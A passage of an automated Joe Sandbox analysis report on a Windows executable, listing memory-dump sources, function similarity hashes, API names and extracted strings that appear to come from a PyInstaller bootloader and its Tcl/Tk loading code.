                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 088c38d7657c52ba90a82f308338cc67b2675aef059fc49f93e8bc461cbe8871
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D031A232B19F4282E7649F29A84012E6AD6AB89BD0F544279EF5DD3BE5DF3CD0028704
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                                                                                                        • Instruction ID: efdd7941a4e1f5c4882e4e9abb1c6c2c9e7e72d90c9ce44a159e8a744c847c8f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0F068717282958BDB988F6DA802A2977D0F7083C0F849079EA8DC3B04DE3CD4518F14
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                                                                                                        • Instruction ID: bbae68961dd79a87e50d03c26a66adf198bf0add6415017c77f09ba1c8dc1894
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7A00261D0CD2AD0EA488F08FC901396335FB64340B8000B1FA0DD10F0BF3CA444D300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 403f487d16009621e611950588cee078c0f027d9c92fe24547de69073f600d01
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C902A420E0DB27A1EE559F6DEC505B86365BF14785F4441B6EE2EC2260FF3CB58A8350
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9
                                                                                                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6BA3A86B7,?,?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A822C
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2810: MessageBoxW.USER32 ref: 00007FF6BA3A28EA
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 44c63cebad8f291ccd3b0504a1ed5e2fc3168f2a865abfc5fe4a7bbc9c259f30
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB517021A2DA6291FF609B2DE8552BE63A2EF94780F4444B1EF4EC26D5FE3CE5058740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1bbb9a030e9cd5e1b7226f60d0ce1c917b999c91af7ede5880acc2d63f03158f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E51D626608BB186D6249F26E4581BAB7A1F798B62F004135EFDEC3694EF3CD085DB10
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                                                                        • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ab9ab2aeca0955af9e50b44400376c0dd281076800e2608d19f9f39d0c93aeae
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57215E21B09B9282EB458F7EEC54179A255EF89B91F5842B1DF2DC33D8EE2CD9918301
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 995b986fa2bc530a268c0c6c8c70c7746d8f1f98b51ea4c9cbc478e9120973be
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6412A372E0DA4386FB609A18D1546B97693FB90750FC84275EF99C6AC6DF3CE9C08B04
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                                                                        • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8c27b6437f13957938516a7d95ec290f834523c6593082ac5e06af5676ee2df1
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91127362E1C94386FB609A18E0547B976A3FB40750FD44277EF9AC6AC8DF7CE5848B10
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ddd9ce5b82b5e67d2b8fe833a4eb0fd5dee940a530c7c2aa4600046e4a4623f0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B41C021B0866682EE10DB1AE8406BE6392FF44BC0F8445B3EF0DC7796EE3CE5468700
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2dbd0267bc39c503077323a437b2cc46c28bb447a4b7e5bcb654a26f015fb296
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3419D32A08AA686EF10DF29E8401B96392FF44784F8445B2EF4DC7B95EE3CE5418704
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                                                        • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ea9230b47db99563a686b8970f9a434c8d928fa84b8169c817ba5e016dbbe272
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75D17F32A08B618AEF209B69D4413AD77A1FB55788F200175EF8DD7B96DF38E495C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
                                                                                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
                                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF6BA3A2D99
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                                                                                        • Instruction ID: c283634f10ea9c9b3aad7e49e69224c42e9663f61968a2266fcf15f34fb443d6
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D31E832708B5142EB209B69F8542AA7796BF88798F414136EF4DD7769EF3CD546C300
